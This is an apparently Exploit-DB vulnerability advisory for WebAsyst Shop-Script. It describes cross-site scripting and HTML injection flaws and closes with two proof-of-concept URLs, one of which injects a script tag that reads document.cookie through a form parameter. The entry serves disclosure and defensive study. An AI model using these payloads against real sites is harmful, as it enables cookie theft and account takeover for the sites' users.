WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection

EDB-ID:

35319

CVE:

N/A




Platform:

PHP

Date:

2011-02-08


source: https://www.securityfocus.com/bid/46250/info

WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.


http://www.example.com/html/scripts/index.php?>[xss]

http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=